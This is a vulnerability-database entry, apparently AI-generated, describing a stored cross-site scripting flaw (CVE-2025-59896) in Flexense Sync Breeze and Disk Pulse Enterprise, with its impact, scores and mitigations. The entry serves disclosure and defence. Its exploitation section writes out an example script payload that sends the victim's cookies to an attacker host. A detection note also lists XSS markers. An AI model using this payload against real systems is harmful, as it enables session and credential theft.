
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2025-59896 is a persistent (stored) authenticated Cross-Site Scripting (XSS) vulnerability affecting Sync Breeze Enterprise Server v10.4.18 and Disk Pulse Enterprise v10.4.18, both developed by Flexense. The vulnerability stems from insufficient input validation in the /add_command?sid= endpoint, specifically in the command_name parameter. It was published on January 28, 2026, and assigned by INCIBE. The CVSS v3.1 base score is 5.4 (Medium), and the CVSS v4.0 base score is 5.1 (Medium) (INCIBE Advisory).
The root cause is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-Site Scripting). An authenticated attacker with low privileges can submit a crafted command_name value to the /add_command?sid= endpoint; because the application fails to sanitize or encode this input before storing and rendering it, the malicious script is persistently saved and later executed in the browsers of other authenticated users who view the affected page. Exploitation requires network access, low privileges, and passive user interaction (a victim must view the page containing the injected payload) (INCIBE Advisory).
Successful exploitation allows an attacker to execute arbitrary JavaScript in the context of another authenticated user's browser session, enabling session token theft, credential harvesting, and unauthorized actions performed on behalf of the victim. The scope is changed (cross-origin impact), with low confidentiality and low integrity impact; availability is not directly affected. Because the payload is stored server-side, every authenticated user who loads the affected view is at risk, potentially enabling privilege escalation if an administrator account is targeted (INCIBE Advisory).
No public proof-of-concept exploit code or active in-the-wild exploitation has been reported for CVE-2025-59896 as of the available data. The EPSS score is approximately 0.047% (0.000470), indicating a very low probability of exploitation in the near term. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. Exploitation requires an authenticated attacker account, limiting the attack surface compared to unauthenticated vulnerabilities (INCIBE Advisory).
/add_command?sid=<session_id>, which accepts a command_name parameter.command_name value containing a JavaScript payload, e.g., command_name=<script>document.location='https://attacker.com/steal?c='+document.cookie</script>./add_command?sid= with command_name values containing HTML/JavaScript tags (e.g., <script>, onerror=, javascript:).Users should contact Flexense or monitor the vendor's official website for a patched release that addresses input validation in the command_name parameter of the /add_command endpoint. As an interim workaround, restrict access to the Sync Breeze Enterprise and Disk Pulse Enterprise web interfaces to trusted internal networks or VPN-only access, reducing exposure to potential attackers. Additionally, enforce the principle of least privilege by limiting the number of accounts with access to the affected web UI, and monitor web server logs for suspicious input patterns in the command_name parameter (INCIBE Advisory).
The vulnerability was disclosed by INCIBE-CERT as part of a notice covering multiple vulnerabilities in Flexense products. No significant public researcher commentary, vendor statements beyond the advisory, or notable media coverage has been identified for this specific CVE.
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."